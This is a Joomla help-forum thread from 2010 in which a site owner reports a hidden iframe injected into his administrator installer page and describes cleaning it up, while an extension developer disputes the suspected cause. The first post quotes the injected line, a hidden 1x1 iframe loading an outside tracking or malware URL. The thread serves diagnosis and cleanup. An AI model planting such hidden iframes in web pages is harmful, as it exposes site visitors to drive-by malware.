The Joomla! Forum ™



Forum rules


Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting.
Forum Post Assistant - If you are serious about wanting help, you should use this tool to help you post.



Post new topic Reply to topic  [ 6 posts ] 
Author Message
PostPosted: Sun Jun 06, 2010 3:20 am 
Joomla! Apprentice
Joomla! Apprentice

Joined: Mon Apr 27, 2009 6:21 pm
Posts: 17
Location: New Delhi, India
on loading http://uniqueindiatour.com/administrato ... _installer I get the chrome message of this malware.

On the front end it is not visible.

I have changed the ftp password.

This is since yesterday. I had installed Ninja RSS component, which later I found after this event that Joomla advises against using it.

I have removed Ninja Rss but the problem persists.

I checked my site on http://www.unmaskparasites.com/ which says nothing is wrong. But it can check the frontend only.

When I do view-source:http://uniqueindiatour.com/administrator/index.php?option=com_installer in the code i find this:

<input type="hidden" name="9ba575d9c85a065355e4c05c0a564be3" value="1" /></form><iframe src="http://internetcountercheck.com/?click=13177296" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
<div class="clr"></div>

It is only when I want to install something that this maliciousness is visible.

I checked the php code of com_installer but could not find any reference to it.

Will I be able to remove it easily?

I have in the meantime advised my hosting provider to do a virus scan as well.

Thanks in advance.

_________________
This too shall pass.

Basho: "Sitting silently doing nothing, the spring comes on its own, the grass grows by itself."


Top
 Profile  
 
PostPosted: Sun Jun 06, 2010 8:01 am 
Joomla! Apprentice
Joomla! Apprentice

Joined: Mon Apr 27, 2009 6:21 pm
Posts: 17
Location: New Delhi, India
I have solved this. The help was from here http://www.msamir.net/joomla-and-wordpress-virus/

Basically downloaded full package of joomla 1.5.18, unzipped it on my machine, uploaded all the files to the webserver. After this, it gave me the message I need to delete the installation folder, which I did.
After this, in the first tests, all izz well :)

Hope I do not have to post again. :)

_________________
This too shall pass.

Basho: "Sitting silently doing nothing, the spring comes on its own, the grass grows by itself."


Top
 Profile  
 
PostPosted: Sun Jun 06, 2010 9:07 am 
Joomla! Apprentice
Joomla! Apprentice

Joined: Mon Apr 27, 2009 6:21 pm
Posts: 17
Location: New Delhi, India
Spoke to soon!
Few components were infected as well. Had to uninstall them and re-install. Seems to work for the moment.

_________________
This too shall pass.

Basho: "Sitting silently doing nothing, the spring comes on its own, the grass grows by itself."


Top
 Profile  
 
PostPosted: Fri Jun 25, 2010 11:35 pm 
User avatar
Joomla! Enthusiast
Joomla! Enthusiast

Joined: Sun Feb 11, 2007 4:59 am
Posts: 236
Location: Nagoya, Japan
Hi delhidjinn,

How do you know it was Ninja RSS that cause it and not just a coincidence of timing?

This virus can only be planted with FTP access to your site which Ninja RSS doesn't have, enable or give.

It also seems odd that it happened the same day you installed Ninja RSS, but we haven't had any other reports of sites being infected with this virus via Ninja RSS.

Can you be certain it was Ninja RSS?

p.s. what do you mean Joomla advises against Ninja RSS?

_________________
NinjaForge - More than 60 Professional, Open Source, Web 2.0 Extensions
http://ninjaforge.com - Get on the cutting edge.


Top
 Profile  
 
PostPosted: Sat Jun 26, 2010 1:44 am 
Joomla! Apprentice
Joomla! Apprentice

Joined: Mon Apr 27, 2009 6:21 pm
Posts: 17
Location: New Delhi, India
Now that we are discussing this:

It could be coincidence because just a day before I gave ftp access to my seo company, maybe it happened then.

I was certain of ninja rss because that was the only component I had installed in those days. But I gave ftp access as well, which I had immediately discontinued on discovering this injection and uninstalled ninja rss. Also, as the component figures on the Joomla's caution list, it was a case of 2 +2 - that's all.

Joomla advises against ninja rss: it was due to the list of components with known vulnerabilities which is the Joomla caution list.

_________________
This too shall pass.

Basho: "Sitting silently doing nothing, the spring comes on its own, the grass grows by itself."


Top
 Profile  
 
PostPosted: Sat Jun 26, 2010 2:13 am 
User avatar
Joomla! Enthusiast
Joomla! Enthusiast

Joined: Sun Feb 11, 2007 4:59 am
Posts: 236
Location: Nagoya, Japan
It should have been taken off the list as we removed the vulnerability 15 minutes after it was announced and we emailed them. It was some code left over from the previous developer which we hadn't noticed. :(

I will email them again. Thanks for letting me know.

Which SEO company do you use by the way?

_________________
NinjaForge - More than 60 Professional, Open Source, Web 2.0 Extensions
http://ninjaforge.com - Get on the cutting edge.


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 6 posts ] 



Who is online

Users browsing this forum: No registered users and 39 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  
Powered by phpBB® Forum Software © phpBB Group